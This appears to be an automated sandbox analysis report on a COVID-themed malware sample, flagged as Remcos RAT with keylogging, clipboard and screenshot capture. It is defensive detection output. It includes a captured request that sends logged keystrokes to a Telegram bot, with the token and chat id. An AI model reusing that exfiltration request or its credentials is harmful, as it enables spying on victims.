Source: PowerShell_transcript.562258.s+AUuVS9.20210913063011.txt.4.dr String found in binary or memory: PS>Test-Connection www.google.com , www.youtube.com , www.google.com , www.youtube.com ,www.google.com , www.youtube.com equals www.youtube.com (Youtube)
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.417366886.0000000002DA1000.00000004.00000001.sdmp String found in binary or memory: Test-Connection www.google.com , www.youtube.com , www.google.com , www.youtube.com ,www.google.com , www.youtube.com equals www.youtube.com (Youtube)
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.416957325.00000000012AE000.00000004.00000001.sdmp String found in binary or memory: Test-Connection www.google.com , www.youtube.com , www.google.com , www.youtube.com ,www.google.com , www.youtube.comO equals www.youtube.com (Youtube)
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421347506.0000000007D20000.00000004.00000001.sdmp String found in binary or memory: Test-Connection www.google.com , www.youtube.com , www.google.com , www.youtube.com ,www.google.com , www.youtube.comX equals www.youtube.com (Youtube)
Source: unknown HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768030b76e62Host: api.telegram.orgContent-Length: 749Connection: Keep-Alive
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49788 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to capture and log keystrokes
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: [Esc] 28_2_004043BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: [Enter] 28_2_004043BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: [Tab] 28_2_004043BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: [Down] 28_2_004043BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: [Right] 28_2_004043BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: [Up] 28_2_004043BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: [Left] 28_2_004043BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: [End] 28_2_004043BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: [F2] 28_2_004043BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: [F1] 28_2_004043BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: [Del] 28_2_004043BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: [Del] 28_2_004043BF
Contains functionality to read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040A71E ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,FindCloseChangeNotification,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,URLDownloadToFileA,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,ShellExecuteA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@ 28_2_0040A71E
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040A71E ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,FindCloseChangeNotification,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,URLDownloadToFileA,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,ShellExecuteA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@ 28_2_0040A71E
Contains functionality to record screenshots
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040D71E CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,StretchBlt,GetObjectA,LocalAlloc,GlobalAlloc,GetDIBits,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,DeleteObject,GlobalFree,DeleteDC,DeleteDC,DeleteDC,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 28_2_0040D71E
Creates a DirectInput object (often for capturing keystrokes)
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.416785382.00000000011DB000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Potential key logger detected (key state polling based)
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_004038DB GetKeyState,GetKeyState,GetKeyState,CallNextHookEx, 28_2_004038DB
Creates a window with clipboard capturing capabilities
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud:

Yara detected Remcos RAT
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3ed9988.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001C.00000000.430910958.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.418169362.0000000002F23000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.468948804.0000000002900000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.429721772.0000000002900000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.429209935.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.432136781.0000000002900000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.418954944.0000000003ED9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.419012391.0000000003F25000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.467780819.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.418279701.0000000002F5D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: UK COVID UPDATES AND ENTITLEMENT.exe PID: 6360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: UK COVID UPDATES AND ENTITLEMENT.exe PID: 6720, type: MEMORYSTR

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.raw.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3ed9988.6.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3ed9988.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3ed9988.6.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.raw.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000000.430910958.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
Source: 0000001C.00000000.430910958.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000000.430910958.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000000.00000002.418169362.0000000002F23000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000000.429209935.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
Source: 0000001C.00000000.429209935.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000000.429209935.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000000.00000002.418954944.0000000003ED9000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.419012391.0000000003F25000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000002.467780819.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
Source: 0000001C.00000002.467780819.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000002.467780819.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000000.00000002.418279701.0000000002F5D000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
One or more processes crash
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 920
Detected potential crypto function
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_01470860 0_2_01470860
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_01470870 0_2_01470870
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_07C10112 0_2_07C10112
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_07C100CF 0_2_07C100CF
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_07C1008D 0_2_07C1008D
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_07C10072 0_2_07C10072
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_080F7238 0_2_080F7238
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_080FA2D8 0_2_080FA2D8
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_080F9B48 0_2_080F9B48
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_080FA2C9 0_2_080FA2C9
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_08136948 0_2_08136948
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_0813CA80 0_2_0813CA80
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_08130A80 0_2_08130A80
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_08135310 0_2_08135310
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_08139BA0 0_2_08139BA0
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_0813745F 0_2_0813745F
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_0813B678 0_2_0813B678
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_08133F48 0_2_08133F48
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_0813D790 0_2_0813D790
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_013FF1B8 33_2_013FF1B8
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_013FD1A0 33_2_013FD1A0
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_013F0590 33_2_013F0590
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_013FDA70 33_2_013FDA70
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_013FCE58 33_2_013FCE58
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_013F1108 33_2_013F1108
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_013F10F8 33_2_013F10F8
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_013F1620 33_2_013F1620
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_013F1612 33_2_013F1612
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_013F0BF0 33_2_013F0BF0
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_013F0BE0 33_2_013F0BE0
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_013F8A08 33_2_013F8A08
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_01428140 33_2_01428140
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_01420090 33_2_01420090
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_014265F0 33_2_014265F0
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0142F708 33_2_0142F708
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0142E738 33_2_0142E738
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0142D7B8 33_2_0142D7B8
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_014238D0 33_2_014238D0
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_01421DC0 33_2_01421DC0
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0142EF20 33_2_0142EF20
